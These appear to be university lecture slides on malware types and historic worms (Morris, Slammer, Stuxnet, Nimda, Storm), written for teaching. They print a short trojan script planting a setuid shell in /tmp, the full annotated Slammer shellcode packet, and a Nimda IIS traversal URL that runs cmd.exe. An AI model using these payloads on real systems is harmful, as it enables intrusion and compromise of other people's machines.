Information Security CS 526 Topic 9 Malwares CS526 Topic 9: Malware

Readings for This Lecture Wikipedia Malware Computer Virus Botnet Rootkit Morris Worm CS526 Topic 9: Malware

Malware Features & Types Infectious: Viruses, worms Concealment: Trojan horses, logic bombs, rootkits Malware for stealing information: Spyware, keyloggers, screen scrapers Malware for profit: Dialers, scarewares, ransomware Malware as platform for other attacks Botnets, backdoors (trapdoors) Many malwares have characteristics of multiple types CS526 Topic 9: Malware

Trojan Horse Software that appears to perform a desirable function for the user prior to run or install, but (perhaps in addition to the expected function) steals information or harms the system. User tricked into executing Trojan horse Expects (and sees) overt and expected behavior Covertly perform malicious acts with user’s authorization Example: Attacker: Place the following file cp /bin/sh /tmp/.xxsh chmod u+s,o+x /tmp/.xxsh rm ./ls ls $* as /homes/victim/ls Victim ls CS526 Topic 9: Malware

Trapdoor or Backdoor Secret entry point into a system Specific user identifier or password that circumvents normal security procedures. Commonly used by developers Could be included in a compiler. MyDoom worm: Places a backdoor on port 3127/tcp to allow remote control of the subverted PC (by putting its own SHIMGAPI.DLL file in the system32 directory and launching it as a child process of the Windows Explorer); this is essentially the same backdoor used by Mimail. CS526 Topic 9: Malware

Logic Bomb Embedded in legitimate programs Activated when specified conditions met E.g., presence/absence of some file; Particular date/time or particular user When triggered, typically damages system Modify/delete files/disks CS526 Topic 9: Malware

Example of Logic Bomb In 1982, the Trans-Siberian Pipeline incident occurred. A KGB operative was to steal the plans for a sophisticated control system and its software from a Canadian firm, for use on their Siberian pipeline. The CIA was tipped off by documents in the Farewell Dossier and had the company insert a logic bomb in the program for sabotage purposes. This eventually resulted in “the most monumental non-nuclear explosion and fire ever seen from space”. CS526 Topic 9: Malware

Spyware Malware that collects little bits of information at a time about users without their knowledge Keyloggers: stealthly tracking and logging key strokes Screen scrapers: stealthly reading data from a computer display May also tracking browsing habit May also re-direct browsing and display ads CS526 Topic 9: Malware

Scareware Malware that scares victims into take actions that ultimately end up compromising our own security. E.g., paying for and installing fake anti-virus products CS526 Topic 9: Malware

CS526 Topic 9: Malware

Ransomware Holds a computer system, or the data it contains, hostage against its user by demanding a ransom. Disable an essential system service or lock the display at system startup Encrypt some of the user's personal files, originally referred to as cryptoviruses, cryptotrojans or cryptoworms Victim user has to enter a code obtainable only after wiring payment to the attacker or sending an SMS message buy a decryption or removal tool CS526 Topic 9: Malware

Virus Attach itself to a host (often a program) and replicate itself Self-replicating code Self-replicating Trojan horses Alters normal code with “infected” version Operates when infected code executed If spread condition then For target files if not infected then alter to include virus Perform malicious action Execute normal program CS526 Topic 9: Malware

Worm Self-replicating malware that does not require a host program Propagates a fully working version of itself to other machines Carries a payload performing hidden tasks Backdoors, spam relays, DDoS agents; … Phases Probing  Exploitation  Replication  Payload CS526 Topic 9: Malware

General Worm Trends Speed of spreading Vector of infection Payloads Slow to fast to stealthy Vector of infection Single to varied Exploiting software vulnerabilities to exploiting human vulnerabilities Payloads From “no malicious payloads beyond spreading” to botnets, spywares, and physical systems CS526 Topic 9: Malware

Morris Worm (November 1988) First major worm Written by Robert Morris Son of former chief scientist of NSA’s National Computer Security Center His father, Robert H. Morris was a researcher at Bell Labs from 1960 until 1986. Then working at the (NSA). Served as chief scientist of the NSA's National Computer Security Center, where he was involved in the production of the Rainbow Series of computer security standards, and retired from the NSA in 1994. Quotes from Robert Morris Never underestimate the attention, risk, money and time that an opponent will put into reading traffic. Rule 1 of cryptanalysis: check for plaintext.[7] The three golden rules to ensure computer security are: do not own a computer; do not power it on; and do not use it. There is a description of Morris in Clifford Stoll's book The Cuckoo's Egg. Many readers of Stoll's book remember Morris for giving Stoll a challenging mathematical puzzle (originally due to John H. Conway) in the course of their discussions on computer security: What is the next number in the sequence 1 11 21 1211 111221? The next sequence is reading out the previous sequence. What comes next: 1 11 21 1211 111221? CS526 Topic 9: Malware

Morris Worm Description Two parts Main program to spread worm look for other machines that could be infected try to find ways of infiltrating these machines Vector program (99 lines of C) compiled and run on the infected machines transferred main program to continue attack CS526 Topic 9: Malware

Vector 1: Debug feature of sendmail Listens on port 25 (SMTP port) Some systems back then compiled it with DEBUG option on Debug feature gives The ability to send a shell script and execute on the host Sendmail is a general purpose email routing program. Both mail transfer agent and mail submission program For mail transfer agent, needs to listen on port 25/tcp for incoming messages from outside of the machine Flushing the local queue of unsent messages on a periodic basis Sendmail is an ‘infamous source of many secure vulnerabilities. In August 2007, about 30% percent of mail servers run Sendmail. Others run Microsoft Exchange Server, Exim, and Postfix; The worm uses TCP to connect to PORT 25 on target machine. Invoke the debug mode. Shell script creates a C program in a temporary file called x$$,l1.c where $$ is current process ID, Then compiles and executes this program The program opens socket to machine that sent script Retrieves worm main program, compiles it and runs CS526 Topic 9: Malware

Vector 2: Exploiting fingerd What does finger do? Finger output arthur.cs.purdue.edu% finger ninghui Login name: ninghui In real life: Ninghui Li Directory: /homes/ninghui Shell: /bin/csh Since Sep 28 14:36:12 on pts/15 from csdhcp-120-173 (9 seconds idle) New mail received Tue Sep 28 14:36:04 2010; unread since Tue Sep 28 14:36:05 2010 No Plan. In Unix, finger is a program you can use to find information about computer users. It usually lists the Using finger, one can find login name, the full name, login time, idle time, time mail was last read, and the user's plan and project files. Useful tools for social engineering attacks, and gathering information. Often blocked to outside domains. CS526 Topic 9: Malware

Vector 2: Exploiting fingerd Listen on port 79 It uses the function gets Fingerd expects an input string Worm writes long string to internal 512-byte buffer Overrides return address to jump to shell code Fingerd is the daemon for answering finger requests. Classical stack-based shell-code exploit. CS526 Topic 9: Malware

Vector 3: Exploiting Trust in Remote Login Remote login on UNIX rlogin, rsh Trusting mechanism Trusted machines have the same user accounts Users from trusted machines do not need to enter passwords /etc/host.equiv – system wide trusted hosts file /.rhosts and ~/.rhosts – users’ trusted hosts file Remote login utilities were designed to make using networked computers easy. Insecure because of passwords are transmitted in clear. Mostly disabled today. Replaced by ssh. Exploit the fact that many computers on a local domain share the same user accounts. To avoid repeated entering of passwords, have a trusting mechanism. Each remote machine may have a file named /etc/hosts.equiv containing a list of trusted hostnames with which it shares usernames. Users with the same username on both the local and remote machine may rlogin from the machines listed in the remote machine's /etc/hosts.equiv file without supplying a password. Individual users may set up a similar private equivalence list with the file .rhosts in their home directories. Each line in this file contains two names: a host- name and a username separated by a space. An entry in a remote user's .rhosts file permits the user named username  who is logged into hostname to log in to the remote machine as the remote user without supplying a password. Host aaa.xyz.com /etc/host.equiv bbb.xyz.com Host bbb.xyz.com User alice rlogin CS526 Topic 9: Malware

Vector 3: Exploiting Trust in Remote Login Worm exploited trust information Examining trusted hosts files Assume reciprocal trust If X trusts Y, then maybe Y trusts X Password cracking Worm coming in through fingerd was running as daemon (not root) so needed to break into accounts to use .rhosts feature Read /etc/passwd, used ~400 common password strings & local dictionary to do a dictionary attack Attack on second host, but need to get first host, can do so if second host is trusted by first. This info is stored in first host, and the worm cannot see yet. Must be a regular user to use rlogin feature. CS526 Topic 9: Malware

Other Features of The Worm Self-hiding Program is shown as 'sh' when ps Files didn’t show up in ls Find targets using several mechanisms: 'netstat -r -n‘, /etc/hosts, … Compromise multiple hosts in parallel When worm successfully connects, forks a child to continue the infection while the parent keeps trying new hosts Worm has no malicious payload Where does the damage come from? Clobbers argv array so a 'ps' will not show its name Opens its files, then unlinks (deletes) them so can't be found; since files are open, worm can still access their contents Try to find neighbors (connected hosts) to compromise netstat (network statistics) is a command-line tool that displays network connections (both incoming and outgoing), routing tables, and a number of network interface statistics. Worm does not delete system's files, modify existing files, install trojan horses, record or transmit decrypted passwords, capture superuser privileges CS526 Topic 9: Malware

Damage One host may be repeatedly compromised Supposedly designed to gauge the size of the Internet The following bug made it more damaging. Asks a host whether it is compromised; however, even if it answers yes, still compromise it with probability 1/8. According to its creator, the Morris worm was not written to cause damage, but to gauge the size of the Internet. However, the worm was released from MIT to disguise the fact that the worm originally came from Cornell. (Incidentally, Morris is now a professor at MIT.) A supposedly unintended consequence of the code, however, caused it to be more damaging: a computer could be infected multiple times and each additional process would slow the machine down, eventually to the point of being unusable. The worm could have determined whether to invade a new computer by asking if there was already a copy running. But just doing this would have made it trivially easy to kill; everyone could just run a process that would answer "yes" when asked if there was already a copy, and the worm would stay away. The defense against this was inspired by Michael Rabin's mantra, "Randomization." To compensate for this possibility, Morris directed the worm to copy itself even if the response is "yes", 1 out of 7 times. CS526 Topic 9: Malware

Increasing propagation speed Code Red, July 2001 Affects Microsoft Index Server 2.0, Exploits known buffer overflow in Idq.dll Vulnerable population (360,000 servers) infected in 14 hours SQL Slammer, January 2003 Affects in Microsoft SQL 2000 Exploits known months ahead of worm outbreak Buffer overflow vulnerability reported in June 2002 Patched released in July 2002 (Bulletin MS02-39) Vulnerable population infected in less than 10 minutes Notice two things. 1. Vulnerabilities long known before worm spreading. 2. Spreading time increasing. CS526 Topic 9: Malware

Slammer Worms (Jan., 2003) MS SQL Server 2000 receives a request of the worm SQLSERVR.EXE process listens on UDP Port 1434 SQLSERVR.EXE SQL Server 2000 CS526 Topic 9: Malware

Slammer’s code is 376 bytes! This byte signals the SQL Server to store the contents of the packet in the buffer UDP packet header 0000: 4500 0194 b6db 0000 6d11 2e2d 89e5 0a9c E...¶Û..m..-.å.. 0010: cb08 07c7 1052 059a 0180 bda8 0401 0101 Ë..Ç.R....½¨.... 0020: 0101 0101 0101 0101 0101 0101 0101 0101 ................ 0030: 0101 0101 0101 0101 0101 0101 0101 0101 ................ 0040: 0101 0101 0101 0101 0101 0101 0101 0101 ................ 0050: 0101 0101 0101 0101 0101 0101 0101 0101 ................ 0060: 0101 0101 0101 0101 0101 0101 0101 0101 ................ 0070: 0101 0101 0101 0101 0101 0101 01dc c9b0 .............ÜÉ° 0080: 42eb 0e01 0101 0101 0101 70ae 4201 70ae Bë........p®B.p® 0090: 4290 9090 9090 9090 9068 dcc9 b042 b801 B........hÜÉ°B¸. 00a0: 0101 0131 c9b1 1850 e2fd 3501 0101 0550 ...1ɱ.Pâý5....P 00b0: 89e5 5168 2e64 6c6c 6865 6c33 3268 6b65 .åQh.dllhel32hke 00c0: 726e 5168 6f75 6e74 6869 636b 4368 4765 rnQhounthickChGe 00d0: 7454 66b9 6c6c 5168 3332 2e64 6877 7332 tTf¹llQh32.dhws2 00e0: 5f66 b965 7451 6873 6f63 6b66 b974 6f51 _f¹etQhsockf¹toQ 00f0: 6873 656e 64be 1810 ae42 8d45 d450 ff16 hsend¾..®B.EÔP.. 0100: 508d 45e0 508d 45f0 50ff 1650 be10 10ae P.EàP.EðP..P¾..® 0110: 428b 1e8b 033d 558b ec51 7405 be1c 10ae B....=U.ìQt.¾..® 0120: 42ff 16ff d031 c951 5150 81f1 0301 049b B...Ð1ÉQQP.ñ.... 0130: 81f1 0101 0101 518d 45cc 508b 45c0 50ff .ñ....Q.EÌP.EÀP. 0140: 166a 116a 026a 02ff d050 8d45 c450 8b45 .j.j.j..ÐP.EÄP.E 0150: c050 ff16 89c6 09db 81f3 3c61 d9ff 8b45 ÀP...Æ.Û..óa...E 0160: b48d 0c40 8d14 88c1 e204 01c2 c1e2 0829 ´..@...Áâ..ÂÁâ.) 0170: c28d 0490 01d8 8945 b46a 108d 45b0 5031 Â....Ø.E´j..E°P1 0180: c951 6681 f178 0151 8d45 0350 8b45 ac50 ÉQf.ñx.Q.E.P.E¬P 0190: ffd6 ebca .ÖëÊ This is the first instruction to get executed. It jumps control to here. The 0x01 characters overflow the buffer and spill into the stack right up to the return address This value overwrites the return address and points it to a location in sqlsort.dll which effectively calls a jump to %esp Restore payload, set up socket structure, and get the seed for the random number generator NOP slide Main loop of Slammer: generate new random IP address, push arguments onto stack, call send method, loop around Jumps to 0x42B0C9DC which is in sqlsort.dll which effectively jumps to esp In eeye.com disassembly: push 42B0C9DCh ; [RET] sqlsort.dll -> jmp esp Key factor of fast propagation: 1. Use UDP rather than TCP. CS526 Topic 9: Malware

Research Worms Warhol Worms Flash Worms Could infect all vulnerable hosts in 15 minutes – 1 hour Uses optimized scanning in three phases Phase 1: initial hit list of potentially vulnerable hosts Phase 2: local subnet scanning Phase 3: permutation scanning for complete, self-coordinated coverage, all instances pick a random host as starting target and follow up with hosts in a particular order (the same order for all instances); if a target host is already compromised, pick another random host Flash Worms Could infect all vulnerable hosts in 30 seconds Determines a complete hit list of servers with relevant service open and include it with the worm We have seen many fast spreading worms, a natural question is how fast can one get. SQL slammer worm is fast, but it affects only machines with Microsft SQL server. It relies on a vulnerability that can be exploited by UDP. Also, one cannot include much payload in one UDP packet. Suppose we use TCP connection, how much can one do. Researchers come up with research worms. These are not actual worms that spread. The design is mainly about the model of scanning & spreading. Assuming that a significant portion of the machines on the Internet are vulnerable, how to reach and compromise them? The number is obtained by simulation and analysis, and not actual spreading. Andy Warhol coined the widely used expression "15 minutes of fame.“"In the future, everyone will be world-famous for 15 minutes.“ Key challenge is to be able to scan the Internet in short amount of time. Making scanning more effective, and avoid wasteful effort. Why is this challenging? Each copy of worm has a local view, needs to coordinate. Local subset scanning. Highly effective initially, not very useful afterwards. Although random scanning works well initially, it begins to die out after the number of uninfected hosts goes down. This die down can be reduced through the use of permutation scanning. In a permutation scan, an already infected machine responds differently than a potential target, as a way of telling the scanning worm that the machine is infected. Not only does this prevent needless reinfections, but it can be used to impose coordination on the worm. In a permutation scan, all worms share a common pseudo random permutation of the IP address space. Such a permutation can be efficiently generated using any block cipher of 32 bits with a preselected key: simply encrypt an index to get the corresponding address in the permutation, and decrypt an address to get its index. Worms infected during the hitlist phase or local subnet scanning start just after their point in the permutation and scan through the permutation, looking for vulnerable machines. Whenever it sees an already infected machine, it chooses a new, random start point and proceeds from there. Worms infected by permutation scanning would start at a random point. There were also research papers on how to model worm spreading growth, and detecting worms based on traffic. Trying to contain or slow down worm spreading. These lines of research died out, because it became apparent that the attack does not aim to taking over the Internet in 15 minutes. CS526 Topic 9: Malware

Email Worms: Spreading as Email Attachments Love Bug worm (ILOVEYOU worm) (2000): May 3, 2000: 5.5 to 10 billion dollars in damage MyDoom worm (2004) First identified in 26 January 2004: On 1 February 2004, about 1 million computers infected with Mydoom begin a massive DDoS attack against the SCO group Similar method use text messages on mobile phones Starting 2000, we are seeing email attachment CS526 Topic 9: Malware

Stuxnet: History (1) 2009 June: Earliest Stuxnet seen Does not use MS10-046 Microsoft Security Bulletin MS10-046: Vulnerability in Windows Shell Could Allow Remote Code Execution Does not have signed drivers 2010 Jan: Stuxnet driver signed With a valid certificate belonging to Realtek Semiconductors 2010 June: Virusblokada reports W32.Stuxnet Stuxnet use MS10-046 Verisign revokes Realtek certificate 2010 July: Eset identify new Stuxnet driver With a valid certificate belonging to JMicron Technology Corp 2010 July: Siemens report they are investigating malware SCADA systems Verisign revokes JMicron certificate CS526 Topic 9: Malware

History (2) 2010 Aug: Microsoft issues MS10-046 Patches windows shell shortcut vulnerability 2010 Sept: Microsoft issues MS10-061 Patches Printer Spooler Vulnerability 2010 Sept: Iran nuclear plant hit by delay Warm weather blamed Measured temperatures were at historical averages 2010 Oct: Iran arrest “spies” Spies who attempted to sabotage the country's nuclear programme Russian nuclear nuclear experts flee Iran CS526 Topic 9: Malware

Scenario (3) The malicious binaries need to be signed to avoid suspicion Two digital certificates were compromised High probability that the digital certificates/keys were physically stolen from the companies premises Realtek and JMicron are in close proximity CS526 Topic 9: Malware

Scenario (4) Initial Infection Stuxnet needed to be introduced to the targeted environment Insider Willing third party Unwilling third party such as a contractor Delivery method USB drive Windows Maintenance Laptop CS526 Topic 9: Malware

Scenario (5) Infection Spread Look for Windows computer that program the PLC’s (Called Field PG) The Field PG are typically not network Spread the Infection on computers on the local LAN Zero-day vulnerabilities Two-year old vulnerability Spread to all available USB drives When a USB drive is connected to the Field PG, the Infection jumps to the Field PG The “airgap” is thus breached CS526 Topic 9: Malware

Scenario (6) Target Infection Look for Specific PLC Running Step 7 Operating System Change PLC code Sabotage system Hide modifications Command and Control may not be possible Due to the “airgap” Functionality already embedded CS526 Topic 9: Malware

Command & Control Stuxnet contacts the command and control server Test if can connect to: www.windowsupdate.com www.msn.com On port 80 Sends some basic information about the compromised computer to the attacker www.mypremierfutbol.com www.todaysfutbol.com The two URLs above previously pointed to servers in Malaysia and Denmark CS526 Topic 9: Malware

Command & Control (2) CS526 Topic 9: Malware

Windows Rootkit Functionality Stuxnet has the ability to hide copies of its files copied to removable drives Stuxnet extracts Resource 201 as MrxNet.sys. The driver is registered as a service creating the following registry entry: HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\MRxNet\”ImagePath” = “%System%\drivers\mrxnet.sys” The driver file is a digitally signed with a legitimate Realtek digital certificate. The driver then filters(hides) files that : Files with a “.LNK” extension having a size of 4,171 bytes.• Files named “~WTR[FOUR NUMBERS].TMP”, whose size is between 4Kb and 8Mb; the sum of the four numbers, modulo 10 is null. For example, 4+1+3+2=10=0 mod 10 Examples: Copy of Copy of Copy of Copy of Shortcut to.lnk Copy of Shortcut to.lnk ~wtr4141.tmp CS526 Topic 9: Malware

Propagation Methods: Network Peer-to-peer communication and updates Infecting WinCC machines via a hardcoded database server password Propagating through network shares Propagating through the MS10-061 Print Spooler Zero-Day Vulnerability Propagating through the MS08-067 Windows Server Service Vulnerability CS526 Topic 9: Malware

Propagation Methods: USB LNK Vulnerability (CVE-2010-2568) AutoRun.Inf CS526 Topic 9: Malware

What was the target? Bushehr Nuclear Plant in Iran 60% Infections in Iran No other commercial gain Stuxnet complexity Stuxnet self destruct date Siemens specific PLC’s CS526 Topic 9: Malware

Conclusion Stuxnet represents the first of many milestones in malicious code history It is the first to exploit multiple 0-day vulnerabilities, Compromise two digital certificates, And inject code into industrial control systems and hide the code from the operator. Stuxnet is of such great complexity Requiring significant resources to develop That few attackers will be capable of producing a similar threat Stuxnet has highlighted direct-attack attempts on critical infrastructure are possible and not just theory or movie plotlines. CS526 Topic 9: Malware

Nimda worm (September 18, 2001) Key Vulnerability to Exploit Microsoft Security Bulletin (MS01-020): March 29, 2001 A logic bug in IE’s rendering of HTML Specially crafted HTML email can cause the launching of an embedded email Vector 1: e-mails itself as an attachment (every 10 days) runs once viewed in preview plane Vector 2: copies itself to shared disk drives on networked PCs Why this may lead to propagating to other hosts? Nimda worm spreads via 5 methods to Windows PCs and servers Because HTML e-mails are simply web pages, IE can render them and open binary attachments in a way that is appropriate to their MIME types. However, a flaw exists in the type of processing that is specified for certain unusual MIME types. If an attacker created an HTML e-mail containing an executable attachment, then modified the MIME header information to specify that the attachment was one of the unusual MIME types that IE handles incorrectly, IE would launch the attachment automatically when it rendered the e-mail. An attacker could use this vulnerability in either of two scenarios. She could host an affected HTML e-mail on a web site and try to persuade another user to visit it, at which point script on a web page could open the mail and initiate the executable. Alternatively, she could send the HTML mail directly to the user. In either case, the executable attachment, if it ran, would be limited only by user's permissions on the system. The email addresses targeted for receiving the worm are harvested from two sources the .htm and .html files in the user's web cache folder the contents of the user's email messages retrieved via the MAPI service (get notified with each message) CS526 Topic 9: Malware

Nimda Worm Vector 3: Exploits various IIS directory traversal vulnerabilities Use crafted URL to cause a command executing at Example of a directory traversal attack: http://address.of.iis5.system/scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir+c:\ Vector 4: Exploit backdoors left by earlier worms Vector 5: Appends JavaScript code to Web pages Once running on the server machine, the worm traverses each directory in the system (including all those accessible through file shares) and writes a MIME-encoded copy of itself to disk using file names with .eml or .nws extensions (e.g., readme.eml). When a directory containing web content (e.g., HTML or ASP files) is found, the following snippet of Javascript code is appended to every one of these web-related files: How to choose web servers? 50% of the time, an address with the same first two octets will be chosen 25% of the time, an address with the same first octet will be chosen 25% of the time, a random address will be chosen Browser machine ---- Web server machine -- Other browser machine CS526 Topic 9: Malware

Nimda worm 'Nimda fix' Trojan disguised as security bulletin claims to be from SecurityFocus and TrendMicro comes in file named FIX_NIMDA.exe TrendMicro calls their free Nimda removal tool FIX_NIMDA.com Dependencies of malware. Nimda depends on other worms. Other trojans depend on it. CS526 Topic 9: Malware

Storm botnet First detected in Jan 2007 Vectors (primarily social engineering): Email attachments Download program to show a video Drive-by exploits DDoS spam fighting sites, and whichever host discovered to investigate the botnet Peer-to-peer communications among bots for asking for C&C server What are some recent worms look like? The original Storm roared to life two years ago, pumping out a whopping 20% of the world’s spam at its peak.  To spread itself it sent fake greeting cards and exploited news headlines and popular events.  This new variant uses the old code and sends fake anti-virus software and spam hawking celeb videos, internet pharmacies, and dating sites. Back-end servers that control the spread of the botnet and Storm worm automatically re-encode their distributed infection software twice an hour, for new transmissions, making it difficult for anti-virus vendors to stop the virus and infection spread. Spameater.com as well as other sites such as 419eater.com and Artists Against 419, both of which deal with 419 spam e-mail fraud, have experienced DDoS attacks, temporarily rendering them completely inoperable. Tracks which hosts are querying the peer-to-peer network "If you try to attach a debugger, or query sites it's reporting into, it knows and punishes you instantaneously. [Over at] SecureWorks, a chunk of it DDoS-ed [distributed-denial-of-service attacked] a researcher off the network. Every time I hear of an investigator trying to investigate, they're automatically punished. It knows it's being investigated, and it punishes them. It fights back," Corman said.[32] Additionally, the location of the remote servers which control the botnet are hidden behind a constantly changing DNS technique called, making it difficult to find and stop virus hosting sites and mail servers. In short, the name and location of such machines are frequently changed and rotated, often on a minute by minute basis. CS526 Topic 9: Malware

Zombie & Botnet Secretly takes over another networked computer by exploiting software flows Builds the compromised computers into a zombie network or botnet a collection of compromised machines running programs, usually referred to as worms, Trojan horses, or backdoors, under a common command and control infrastructure. Uses it to indirectly launch attacks E.g., DDoS, phishing, spamming, cracking CS526 Topic 9: Malware

Rootkit A rootkit is software that enables continued privileged access to a computer while actively hiding its presence from administrators by subverting standard operating system functionality or other applications. Emphasis is on hiding information from administrators’ view, so that malware is not detected E.g., hiding processes, files, opened network connections, etc Example: Sony BMG copy protection rootkit scandal In 2005, Sony BMG included Extended Copy Protection on music CDs, which are automatically installed on Windows on CDs are played. Software installed before EULAs are shown. The supposed rootkit removal didn’t remove the software, simply unhide the files. CS526 Topic 9: Malware

Types of Rootkits User-level rootkits Kernel-level rootkits Replace utilities such as ps, ls, ifconfig, etc Replace key libraries Detectable by utilities like tripwire Kernel-level rootkits Replace or hook key kernel functions Through, e.g., loadable kernel modules or direct kernel memory access A common detection strategy: compare the view obtained by enumerating kernel data structures with that obtained by the API interface Can be defended by kernel-driver signing (required by 64-bit windows) CS526 Topic 9: Malware

More Rootkits Bootkit (variant of kernel-level rootkit) Replace the boot loader (master boot record) Used to attack full disk encryption key Malicious boot loader can intercept encryption keys or disable requirement for kernel-driver signing Hypervisor-level rootkits Hardware/firmware rootkits Whoever gets to the lower level has the upper hand. CS526 Topic 9: Malware

How does a computer get infected with malware or being intruded? Executes malicious code via user actions (email attachment, download and execute trojan horses, or inserting USB drives) Buggy programs accept malicious input daemon programs that receive network traffic client programs (e.g., web browser, mail client) that receive input data from network Programs Read malicious files with buggy file reader program Configuration errors (e.g., weak passwords, guest accounts, DEBUG options, etc) Physical access to computer It appears these are the four primary ways. CS526 Topic 9: Malware

Coming Attractions … Web Security CS526 Topic 9: Malware